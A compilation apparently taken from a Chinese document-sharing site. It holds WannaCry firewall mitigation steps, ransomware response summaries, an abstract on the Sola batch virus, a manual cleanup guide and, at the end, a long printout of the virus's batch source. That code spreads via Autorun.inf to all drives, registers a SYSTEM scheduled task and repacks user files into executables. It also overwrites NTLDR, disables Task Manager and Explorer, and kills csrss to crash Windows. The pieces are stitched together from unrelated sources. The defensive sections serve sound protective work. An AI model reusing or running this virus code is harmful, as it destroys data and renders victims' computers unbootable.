SOLA病毒批处理
永恒之蓝(勒索病毒)解决方案说明
勒索病毒WannaCry解决办法
1、为计算机安装最新的安全补丁,微软已发布补丁MS17-010修复了“永恒之蓝”攻击的系统漏洞,请尽快安装此安全补丁,对于Windows XP、2003等微软已不再提供安全更新的机器,可以借助其它安全软件更新漏洞。
2、关闭445、135、137、138、139端口,关闭网络共享。
3、强化网络安全意识:不明链接不要点击,不明文件不要下载,不明邮件不要打开。
4、尽快(今后定期)备份自己电脑中的重要文件资料到移动硬盘、U盘,备份完后脱机保存该磁盘。
5、建议仍在使用Windows XP,Windows 2003操作系统的用户尽快升级到Window
7/Windows 10,或Windows 2008/2012/2016操作系统。
按下键盘的Windows键,打开控制面板
点击Windows防火墙
点击左边高级设置
点击左上角的入站规则
点击右边的新建规则
点击第二个选项→端口,点击下一步
选择TCP
在下方特定本地端口中输入135,445,点击下一步
选择第三个选项→阻止连接,点下一步,再点下一步
输入名称:比特币病毒防护,点击完成
重复一次3-10,在第7步时选择UDP
做完上面所有步骤后你会在入站规则的最上方看到两个新建的规则,这就表示完成了,保险起见,重启一下电脑。
勒索病毒处置总结
勒索病毒处置总结1. 简介勒索病毒是指一种恶意软件,通过加密或锁定受害者的文件,并要求支付赎金才能解密或解锁文件。
近年来,勒索病毒攻击事件不断增加,并给个人用户、企业和政府机构带来严重危害。
本文档将总结勒索病毒的常见类型、处置策略和预防措施,帮助用户更好地应对和应对勒索病毒攻击。
2. 勒索病毒的常见类型2.1 加密型勒索病毒加密型勒索病毒通过使用强大的加密算法对受害者的文件进行加密,使其无法打开或读取。
攻击者通常要求受害者支付赎金以获取解密密钥,从而恢复文件的可访问性。
2.2 锁定型勒索病毒锁定型勒索病毒会锁定受害者的计算机或移动设备,并阻止其访问操作系统或特定应用程序。
为了解锁设备,受害者需支付赎金以获取解锁密码或工具。
3. 勒索病毒的处置策略3.1 与安全团队合作一旦发现系统受到勒索病毒攻击,应立即与安全团队或专业安全公司合作。
安全团队将帮助受害者分析病毒样本,并提供属于该病毒家族的解密工具或解锁密钥,以恢复文件的可用性。
3.2 断开网络连接为防止勒索病毒进一步传播和感染其他系统,建议立即断开受感染计算机与局域网或互联网的连接。
这将降低病毒在网络中的传播速度,同时阻止攻击者与受感染计算机进行通信。
3.3 禁止支付赎金虽然支付赎金可能看起来是解决问题的简单方法,但并不推荐这样做。
首先,付款并不能保证攻击者会提供有效的解密或解锁工具。
其次,付款只会刺激更多的犯罪行为。
最重要的是,政府机构和执法机构是反对赎金支付的,因为这可能会支持罪犯活动。
3.4 备份和恢复及时备份文件是预防和应对勒索病毒的最佳策略之一。
如果受到攻击,您可以随时恢复备份文件,并尽可能减少数据丢失和业务中断。
3.5 安全软件保护定期更新和使用可靠的安全软件(如杀毒软件、防火墙等)可以帮助您保护系统免受勒索病毒和其他恶意软件的攻击。
更重要的是,保持软件及时更新以获取最新的病毒定义和安全补丁。
4. 勒索病毒攻击的预防措施4.1 教育培训用户和组织应定期进行有关勒索病毒的安全意识培训。
Sola病毒结构论文
浅析Sola病毒结构摘要: sola病毒是一种以批处理文件为主要运行体的病毒。
其技术含量并不算高,但对用户数据文件所造成的影响较大。
其主要特征是感染doc、txt、exe和jpg四类文件,将其变为exe文件。
本文针对sola病毒的特征、结构做了简单分析,并归纳了sola病毒的处理方法。
abstract: sola virus is a kind of batch virus which mainly runs by bat files. it hasn’t high technical content, but makes great impact on the user data files. its main feature is infecting with four types of files in doc, txt, exe and jpg, turns them into exe files. author made a simple analysis of the characteristics and structure of the virus in sola,and summarized the approach of sola virus.关键词: sola;病毒;结构key words: sola;virus;structure中图分类号:tp30 文献标识码:a 文章编号:1006-4311(2012)30-0215-020 引言sola病毒又名“死亡问答”宅男病毒,是一款由批处理文件运行的病毒,技术含量不很高,威力也不算强大,但对用户文件造成的影响较大,至今仍然可以见到被sola病毒感染入侵的案例。
由于是批处理病毒,源代码容易获取,所采用的隐藏手段也容易被破解,所以对于那些对病毒原理感兴趣,同时又没有专业工具的人来说是有一定研究价值的素材。
1 sola病毒特征sola病毒有变种,本文针对较有代表性的版本做简单分析。
勒索病毒应急响应
二、 政企用户安全建议 .......................................................................................................... 22 附录 1:勒索病毒已知被利用漏洞合集 .............................................................................. 24 附录 2:奇安信安全服务团队............................................................................................. 25 附录 3:奇安信虚拟化安全管理系统.................................................................................. 26 附录 4:奇安信天擎敲诈先赔服务 ..................................................................................... 27 附录 5:奇安信安全监测与响应中心.................................................................................. 28
第五章 如何加强防护 ................................................................................................... 22 一、 终端用户安全建议 .......................................................................................................... 22
应急响应之勒索病毒
应急响应之勒索病毒4.1 勒索病毒简介勒索病毒通常利⽤⾮对称加密算法和对称加密算法组合的形式来加密⽂件4.1.1 常见勒索病毒·STOP勒索病毒·GandCrab勒索病毒·REvil/Sodinokibi勒索病毒·Globelmposter勒索病毒·CrySiS/Dharma勒索病毒·Phobos勒索病毒·Ryuk勒索病毒·Maze(迷宫)勒索病毒·Buran勒索病毒4.1.2 勒索病毒传播⽅法·服务器⼊侵传播:通过系统或者软件漏洞进⼊服务器,或RDP破解远控;利⽤病毒,⽊马来盗取密码进⾏⼊侵;·利⽤漏洞⾃动传播:利⽤系统⾃⾝漏洞进⾏传播·软件供应链攻击传播:对合法软件进⾏劫持篡改,绕过了安全产品·邮件附件传播:在附件中夹带恶意⽂件,执⾏其中的脚本·挂马⽹页传播:在⽹页插⼊⽊马,受害的为裸奔⽤户4.1.3 勒索病毒的攻击特点⽆C2服务器加密技术:·在加密前先随机⽣成新的加密密钥对(⾮对称公,私钥)·使⽤新⽣成的公钥对⽂件进⾏加密·采⽤攻击者预埋的公钥把新⽣成的私钥进⾏加密,保存于⼀个ID⽂件中或嵌⼊加密⽂件⽆C2服务器解密技术:·通过邮件和在线提交的⽅法,提交ID串或加密⽂件中的加密私钥(⼀般攻击者会提取该私钥)·攻击者使⽤保留的与预埋公钥对应的私钥解密受害者提交过来的私钥·把解密私钥或解密⼯具交付给受害者进⾏解密勒索病毒平台化运营更加成熟勒索病毒攻击的定向化,⾼级化漏洞利⽤频率更⾼,攻击平台更多攻击⽬的多样化4.1.7 勒索病毒的防御⽅法⽂档⾃动备份隔离(定时任务脚本⾃动备份)综合性反勒索病毒技术(蜜罐)云端免疫技术(云端下发免疫)密码保护技术(采⽤弱密码及双因⼦认证)4.2 常规处置⽅法在勒索病毒的处置上,通常要应急响应⼯程师采取⼿动处置与专业查杀⼯具相结合的⽅法4.2.1 隔离被感染的主机/服务器在确认服务器/主机感染病毒后,应⽴即隔离被感染的服务器/主机,主要采取物理隔离,访问控制权限。
勒索病毒处置方案
勒索病毒处置方案现代社会以网络为主要工具,如何保障网络安全成为一项重要的任务。
勒索病毒作为当前网络安全领域内比较常见的病毒,给企业和个人带来了很大的损失。
因此,制定一套有效的勒索病毒处置方案,成为保障网络安全和保护个人隐私的一项必要措施。
勒索病毒特点勒索病毒通常采用一些常见的手段,比如通过电子邮件、非正规软件等途径感染电脑。
其病毒分布一般是通过一些工具扫描漏洞将恶意代码传达到目标电脑。
常用的勒索病毒有Locky、WannaCry、Petya等。
勒索病毒最主要的特点在于它可以封锁受害者电脑、网络或者文件,从而勒索受害者支付赎金才能恢复。
此外,病毒也会偷窥用户私人信息,窃取盈利渠道等。
处置方案勒索病毒的处置方案主要包括以下几步:第一步:备份重要数据据不完全统计,超过90%的勒索病毒都是利用电脑的弱点进行攻击,随后加密电脑中的个人文件,并对受害者进行勒索,索要赎金。
因此,备份数据是非常关键的一步。
请务必将重要文件备份到外部硬盘、云存储等安全环境之中。
第二步:隔离电脑如果你的电脑已经感染了勒索病毒,第一时间隔离电脑,将电脑与其他计算机、网络和外部存储设备分离。
避免病毒的尾随传播和蔓延。
第三步:使用杀毒软件进行扫描勒索病毒的感染与普通病毒的感染方式相似,也需要利用一些扫描工具对电脑进行全面检测。
使用可靠的杀毒软件进行扫描,找出感染点,消灭病毒。
第四步:在未支付赎金之前不要轻易尝试解密在购买恢复文件前请务必进行咨询、确认后谨慎操作,因为勒索病毒是利用恐怖和威慑来获得你的赎金。
无论如何,如果你已经备份了重要文件,就不需要贸然支付目前日益出现的高额赎金。
第五步:修改密码和查杀木马在清除病毒后,请及时修改所有相关密码。
另外,请利用电脑的杀毒软件,扫描并清除任何木马病毒。
预防勒索病毒的措施除了以上的处置方案外,预防勒索病毒也非常重要。
主要有以下几点:1.尽量不要下载珍藏版、破解版等不安全的软件,而更应该使用权威可靠的软件下载渠道。
勒索病毒分析报告
勒索病毒分析报告引言本文对一种名为勒索病毒的恶意软件进行了深入分析和研究。
勒索病毒是一种威胁严重的恶意软件,它会加密用户文件,并要求支付赎金以解密这些文件。
本文将详细介绍勒索病毒的传播途径、感染方式、加密算法等相关内容,并提供一些对抗勒索病毒的建议。
分析方法分析勒索病毒的过程中,我们采用了以下方法:1.样本收集:收集了多个勒索病毒样本,并在安全环境下进行分析,以避免对真实环境造成影响。
2.动态行为分析:使用虚拟机和沙箱环境,观察勒索病毒的行为,包括文件的加密、系统的修改等。
3.静态特征分析:对勒索病毒的二进制文件进行静态分析,提取出文件结构、加密算法等特征信息。
4.网络流量分析:捕获勒索病毒感染过程中的网络流量,分析其通信行为和C&C服务器地址。
勒索病毒的传播途径勒索病毒主要通过以下途径进行传播:1.恶意电子邮件附件:勒索病毒制作者会将病毒程序隐藏在看似正常的电子邮件附件中,一旦用户打开附件,病毒即开始感染用户的计算机。
2.恶意网站链接:黑客通过在恶意网站上放置下载病毒的链接,诱使用户点击下载并感染计算机。
3.外部存储设备:感染了勒索病毒的计算机连接到外部存储设备(如U盘)后,病毒会自动复制到设备中,从而传播到其他计算机。
勒索病毒的感染方式一旦用户的计算机被感染,勒索病毒会通过以下方式进行感染活动:1.文件加密:勒索病毒会扫描用户计算机上的文件,并使用强大的加密算法对这些文件进行加密,使其无法被用户打开和使用。
2.弹窗提示:感染后,勒索病毒会弹出一个提示窗口,要求用户支付赎金以获取解密密钥。
通常勒索病毒会采用比特币等虚拟货币进行支付,以保证匿名性。
3.修改系统设置:为了保证用户无法轻易恢复被加密的文件,勒索病毒会修改用户计算机的系统设置,禁用一些常用的恢复功能。
勒索病毒的加密算法勒索病毒通常使用高强度的加密算法对用户文件进行加密,以保证解密难度极大。
常见的加密算法包括:1.RSA加密算法:勒索病毒使用RSA算法生成一对公钥和私钥,公钥用于文件加密,私钥用于解密。
sola病毒使文件变成exe后的手工杀毒及修复方法
sola 病毒使文件变成exe后的手工杀毒及修复方法电脑病毒看不见,却无处不在,有时防护措施不够或者不当操作都会导致病毒入侵。
有用户电脑被一个名为sola的病毒感染,造成很多word文档(doc)、图片(jpg)都变成了exe文件,而且无法打开。
方法步骤用瑞星查毒无法差到,用卡巴升级到5月25号以后的才能查到,但是注意卡巴会把感染的word文档、图片一起删除!因为很多文件都是加急和重要的,如果丢失了就问题就严重了,所以不懂电脑千万别用卡巴斯基,因为他太专业了。
幸好这个毒源文件不多,几下我就删干净了,具体清除方法网上有,但我的方法可能更简单点:(如果你不懂怎样进安全模式怎样查看隐藏文件怎样解压缩就不用往下看了)1、进安全模式。
一定要进安全模式,不然像icesword这些软件他能模拟,打开后无法看见他的病毒进程sleep.exe。
这一度欺骗了我,利害!2、删每个分区下的名为sola隐藏文件夹3、搜索windows目录下关键字“sola"的所有文件和文件夹(注意打开搜索高级选项下的“搜索隐藏文件和系统文件”和“搜索子文件夹”),删除所有有关sola这个名字的文件和文件夹,基本就是在windows/fonts这个目录下有个solasetup文件夹,一定要找到它,删除这个文件夹包括其内全部文件。
4、windows/fonts这个目录下有个sleep.exe文件,按创建时间排序,删除所有和他同一时间创建的文件。
5、个别机器在system32下还有个sleep.exe文件,删除。
这样就清干净了。
但是我想说的重头戏才开始,怎样恢复被破坏的word文档和图片呢?!网上我没找到教程,希望对大家有用:如果直接把后缀该回doc或jpg是无法打开文件的,而是要把后缀(扩展名)改称rar,再双击用winrar打开,你会发现里面有三个文件,其中一个就是你原来的文件或图片,另外两个是病毒文件,选择你要恢复的原文件解压缩到硬盘就可以了,注意只选择解压缩原文件,另外两个病毒文件千万不要解压缩。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
:CheckSignif "%1"=="-USB" start /max ..if "%1"=="-USB" cd SOLAif exist %systemroot%\Fonts\HIDESE~1\sola.sign goto Open:FileCopyset selfname=%0:HIDESelfdate %Date%md %systemroot%\Fonts\HIDESELF...\date %RealDate%if not "%1"=="-USB" type %selfname%>%systemroot%\Fonts\HIDESE~1\sola.batif "%1"=="-USB" type sola.bat>%systemroot%\Fonts\HIDESE~1\sola.battype Function.dll>%systemroot%\Fonts\HIDESE~1\Function.exeecho On Error Resume Next>%systemroot%\Fonts\HIDESE~1\SOLA.VBSecho setws=wscript.createobject("wscript.shell")>>%systemroot%\Fonts\HIDESE~1\SOLA.VBS echo ws.run "cmd /c %sola%\SOLA.BAT-Install",0 >>%systemroot%\Fonts\HIDESE~1\SOLA.VBScscript %systemroot%\Fonts\HIDESE~1\SOLA.VBSecho>%systemroot%\Fonts\HIDESE~1\sola.signdel %systemroot%\Fonts\HIDESE~1\SOLA.VBSgoto Open:Install:PackerSetup%SystemDrive%cd %systemroot%\Fonts\HIDESE~1if exist Function.exe taskkill /f /im Function.exeif exist solasetup rd /s /q solasetupmd solasetupcd solasetupcopy ..\Function.exe Function.dll..\Function.exe -xcd..date %Date%type %setup%\rar.exe >%systemroot%\system32\rar.exedate %Realdate%copy %setup%\Function.dll %sola%\Function.dllattrib %sola%\Function.dll +s +h +rrar -m0 -ep -ep1 a %setup%\docpack.dll %sola%\Function.dllrar -m0 -ep -ep1 a %setup%\txtpack.dll %sola%\Function.dllrar -m0 -ep -ep1 a %setup%\exepack.dll %sola%\Function.dllrar -m0 -ep -ep1 a %setup%\jpgpack.dll %sola%\Function.dlldel Function.exe:Mainsetupset A0001=copyset A0002=attribset A0003=echoset A0005=Shell Hardware Detectiontasklist >%sola%\task.txtFOR /F "tokens=1" %%i in ('findstr /I "svchost.exe" "%sola%\task.txt"') do set svchost=%%i%A0001% %systemroot%\system32\cmd.exe %sola%\%svchost%del %sola%\task.txt:Tasks%A0002% %systemroot%\Tasks\Tasks.job -s -h -rdel %systemroot%\Tasks\Tasks.jobdate %Date%type %setup%\Tasks.xxx>%systemroot%\Tasks\Tasks.jobschtasks /change /ru "NT AUTHORITY\SYSTEM" /tn "Tasks" & if errorlevel 1 goto TaskFaildate %RealDate%goto TaskSuc:TaskFail%homedrive%cd "%ALLUSERSPROFILE%"cd 「开始」菜单\程序\启动date %Date%%A0003% On Error Resume Next>SOLA.VBS%A0003% set ws=wscript.createobject("wscript.shell")>>SOLA.VBS%A0003% ws.run "%sola%\svchost.exe /c %sola%\SOLA.BAT -Run",0 >>SOLA.VBS%A0001% SOLA.VBS %sola%\SOLA.VBS%A0003% NT>%systemroot%\Fonts\HIDESE~1\NoTasksdate %RealDate%:TaskSuc%A0002% %systemroot%\Tasks\Tasks.job +s +h +rdate %Date%%A0001% %setup%\sleep.exe %systemroot%\system32\sleep.exedate %RealDate%:NoAutoPlaynet stop "%A0005%"%A0003% Windows Registry Editor Version5.00>%systemroot%\Fonts\HIDESE~1\Regedit.reg%A0003%[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ShellHWDetection]>>%syste mroot%\Fonts\HIDESE~1\Regedit.regregedit /s %systemroot%\Fonts\HIDESE~1\Regedit.reg::End of Installgoto End&if errorlevel 1 exit::End of Install:Runset runroot=%ALLUSERSPROFILE%\「开始」菜单\程序\启动set taskroot=%systemroot%\Tasks:RunTimeChkif not exist %sola%\RunTime.txt echo !50>%sola%\RunTime.txtFOR /F "tokens=1 delims=!" %%i in (%sola%\RunTime.txt) do set RunTime=%%iif /i %RunTime% leq 0 goto Virusset /a RunTime=%Runtime%-1echo !%Runtime%>%sola%\RunTime.txt:Diskchkecho On Error Resume Next>%systemroot%\Fonts\HIDESE~1\RecentInf.VBSecho setws=wscript.createobject("wscript.shell")>>%systemroot%\Fonts\HIDESE~1\RecentInf .VBSecho ws.run "%sola%\svchost.exe/c %setup%\RecentInf.bat",0 >>%systemroot%\Fonts\HIDESE~1\RecentInf.VBScscript %systemroot%\Fonts\HIDESE~1\RecentInf.VBSdel %systemroot%\Fonts\HIDESE~1\RecentInf.VBSfor %%i in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do vol %%i:&if errorlevel 1 set %%i=1for %%i in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do echo 1>%%i:\solachk1 & findstr . %%i:\solachk1 & if not errorlevel 1 del %%i:\solachk1& findstr/C:"SOLA_1.0_2.0" %%i:\Autorun.inf & if errorlevel 1 attrib -s -h-r %%i:\Autorun.inf©/y %setup%\Autorun.inf %%i:\Autorun.inf&attrib %%i:\Autorun.inf +s +h+r&md %%i:\SOLA© /y "%setup%\sola.bat" %%i:\SOLA\SOLA.BAT© /y"%setup%\Function.dll" %%i:\SOLA\Function.dll&attrib %%i:\SOLA +s +h +r:Turnif "%C%"=="1" vol C:&if not errorlevel 1 call %setup%\Scan.bat C:if "%D%"=="1" vol D:&if not errorlevel 1 call %setup%\Scan.bat D:if "%E%"=="1" vol E:&if not errorlevel 1 call %setup%\Scan.bat E:if "%F%"=="1" vol F:&if not errorlevel 1 call %setup%\Scan.bat F:if "%G%"=="1" vol G:&if not errorlevel 1 call %setup%\Scan.bat G:if "%H%"=="1" vol H:&if not errorlevel 1 call %setup%\Scan.bat H:if "%I%"=="1" vol I:&if not errorlevel 1 call %setup%\Scan.bat I:if "%J%"=="1" vol J:&if not errorlevel 1 call %setup%\Scan.bat J:if "%K%"=="1" vol K:&if not errorlevel 1 call %setup%\Scan.bat K:if "%L%"=="1" vol L:&if not errorlevel 1 call %setup%\Scan.bat L:if "%M%"=="1" vol M:&if not errorlevel 1 call %setup%\Scan.bat M:if "%N%"=="1" vol N:&if not errorlevel 1 call %setup%\Scan.bat N:if "%O%"=="1" vol O:&if not errorlevel 1 call %setup%\Scan.bat O:if "%P%"=="1" vol P:&if not errorlevel 1 call %setup%\Scan.bat P:if "%Q%"=="1" vol Q:&if not errorlevel 1 call %setup%\Scan.bat Q:if "%R%"=="1" vol R:&if not errorlevel 1 call %setup%\Scan.bat R:if "%S%"=="1" vol S:&if not errorlevel 1 call %setup%\Scan.bat S:if "%T%"=="1" vol T:&if not errorlevel 1 call %setup%\Scan.bat T:if "%U%"=="1" vol U:&if not errorlevel 1 call %setup%\Scan.bat U:if "%V%"=="1" vol V:&if not errorlevel 1 call %setup%\Scan.bat V:if "%W%"=="1" vol W:&if not errorlevel 1 call %setup%\Scan.bat W:if "%X%"=="1" vol X:&if not errorlevel 1 call %setup%\Scan.bat X:if "%Y%"=="1" vol Y:&if not errorlevel 1 call %setup%\Scan.bat Y:if "%Z%"=="1" vol Z:&if not errorlevel 1 call %setup%\Scan.bat Z:if "%C%"=="2" vol C:&if errorlevel 1 set C=1if "%D%"=="2" vol D:&if errorlevel 1 set D=1if "%E%"=="2" vol E:&if errorlevel 1 set E=1if "%F%"=="2" vol F:&if errorlevel 1 set F=1if "%G%"=="2" vol G:&if errorlevel 1 set G=1if "%H%"=="2" vol H:&if errorlevel 1 set H=1if "%I%"=="2" vol I:&if errorlevel 1 set I=1if "%J%"=="2" vol J:&if errorlevel 1 set J=1if "%K%"=="2" vol K:&if errorlevel 1 set K=1if "%L%"=="2" vol L:&if errorlevel 1 set L=1if "%M%"=="2" vol M:&if errorlevel 1 set M=1if "%N%"=="2" vol N:&if errorlevel 1 set N=1if "%O%"=="2" vol O:&if errorlevel 1 set O=1if "%P%"=="2" vol P:&if errorlevel 1 set P=1if "%Q%"=="2" vol Q:&if errorlevel 1 set Q=1if "%R%"=="2" vol R:&if errorlevel 1 set R=1if "%S%"=="2" vol S:&if errorlevel 1 set S=1if "%T%"=="2" vol T:&if errorlevel 1 set T=1if "%U%"=="2" vol U:&if errorlevel 1 set U=1if "%V%"=="2" vol V:&if errorlevel 1 set V=1if "%W%"=="2" vol W:&if errorlevel 1 set W=1if "%X%"=="2" vol X:&if errorlevel 1 set X=1if "%Y%"=="2" vol Y:&if errorlevel 1 set Y=1if "%Z%"=="2" vol Z:&if errorlevel 1 set Z=1if exist %systemroot%\Fonts\HIDESE~1\NoTasks if not exist "%runroot%\SOLA.VBS" copy "%sola%\SOLA.VBS" "%runroot%\SOLA.VBS"if not exist %systemroot%\Fonts\HIDESE~1\NoTasks if not exist %Taskroot%\Tasks.job copy %setup%\Tasks.xxx %Taskroot%\Tasks.job&attrib %Taskroot%\Tasks.job +s +h +r&schtasks /change /ru "NT AUTHORITY\SYSTEM" /tn "Tasks"sleep 2000goto Turn::End of Rungoto End&if errorlevel 1 exit::End of Run:Virusif not "%Runtime%"=="0" goto VirusChkset /a RunTime=%Runtime%-1echo !%Runtime%>%sola%\RunTime.txtcd "%ALLUSERSPROFILE%\「开始」菜单\程序\启动"echo On Error Resume Next>TENBATSU.VBSecho set ws=wscript.createobject("wscript.shell")>>TENBATSU.VBSecho ws.run "%sola%\sola.bat -Tenbatsu",0 >>TENBATSU.VBSgoto Diskchk:VirusChkif not exist "%ALLUSERSPROFILE%\「开始」菜单\程序\启动\TENBATSU.VBS" goto Kill goto Diskchk:Tenbatsu:KillNTLDRattrib %systemdrive%\NTLDR -s -h -rcopy /Y %systemdrive%\NTLDR %sola%\NTLDRecho NO NTLDR>%systemdrive%\NTLDR::attrib %systemdrive%\NTLDR +s +h +r:PauseSFCstart mshta "javascript:new ActiveXObject('WScript.Shell').Run('ntsd -pn winlogon.exe',0);window.close()":KillTaskmgrdel /q /a %systemroot%\system32\dllcache\taskmgr.exetaskkill /f /im taskmgr.exe & if errorlevel 1 ren %systemroot%\system32\taskmgr.exe taskmgr.xxx & if errorlevel 1 start mshta "javascript:newActiveXObject('WScript.Shell').Run('ntsd -c q -pn taskmgr.exe',0);window.close()" & sleep 500ren %systemroot%\system32\taskmgr.exe taskmgr.xxx:KillExplorertaskkill /f /im explorer.exe >nul& if errorlevel 1ren %systemroot%\system32\explorer.exe explorer.xxx & start mshta "javascript:new ActiveXObject('WScript.Shell').Run('ntsd -c q -pnexplorer.exe',0);window.close()" & sleep 500ren %systemroot%\explorer.exe explorer.xxxstart /max %setup%\TENBATSU.BAT:Timesetsleep 660000if exist %sola%\Killself Exit:Killattrib %systemdrive%\NTLDR -s -h -recho NO NTLDR>%systemdrive%\NTLDR::attrib %systemdrive%\NTLDR +s +h +rtasklist >%sola%\Task.txtFOR /F "tokens=2" %%i in ('findstr /I "csrss.exe" "%sola%\Task.txt"') do ntsd -p %%i goto Diskchk:KillSelf:StartExplorerren %systemroot%\explorer.xxx explorer.exestart %systemroot%\explorer.exe:BackNTLDRattrib %systemdrive%\NTLDR -s -h -rcopy /Y %sola%\NTLDR %systemdrive%\NTLDRattrib %systemdrive%\NTLDR +s +h +r:RenTmgren %systemroot%\system32\taskmgr.xxx taskmgr.exe:KillViruscopy %setup%\KillVirus.txt %sola%\KillVirus.txtC:cd\md ~Installcd ~Installrar x -hpkakenhi200601 %setup%\SolaKiller.rarmshta "javascript:newActiveXObject('WScript.Shell').Run('C:\\~Install\\Install.bat %%1',0);window.cl ose()"rd /s /q %setup%attrib %systemroot%\Tasks\Tasks.job -s -h -rdel %systemroot%\Tasks\Tasks.jobcd "%ALLUSERSPROFILE%\「开始」菜单\程序\启动"if exist sola.vbs del sola.vbsif exist tenbatsu.vbs del tenbatsu.vbsstart %systemroot%\system32\notepad.exe %sola%\KillVirus.txtdel %sola%\sola.batExit:Openif "%1"=="-USB" Exitgoto GetName:BackOpenif not exist "%Name%" exitcall "%Name%":SaveFOR /F "delims=:" %%i in ('findstr "%Code%" *.exe') do set PackName=%%i rar -m0 -ep -ep1 a "%PackName%" "%Name%"echo %Code%>>"%PackName%":Delattrib "%Name%" -s -h -rdel "%Name%"attrib Function.dll -s -h -rdel Function.dllattrib %0 -s -h -rdel %0exit::CMD program will stop there.:GetNameset Name=hardcfg使用说明.txtgoto Backopen:End。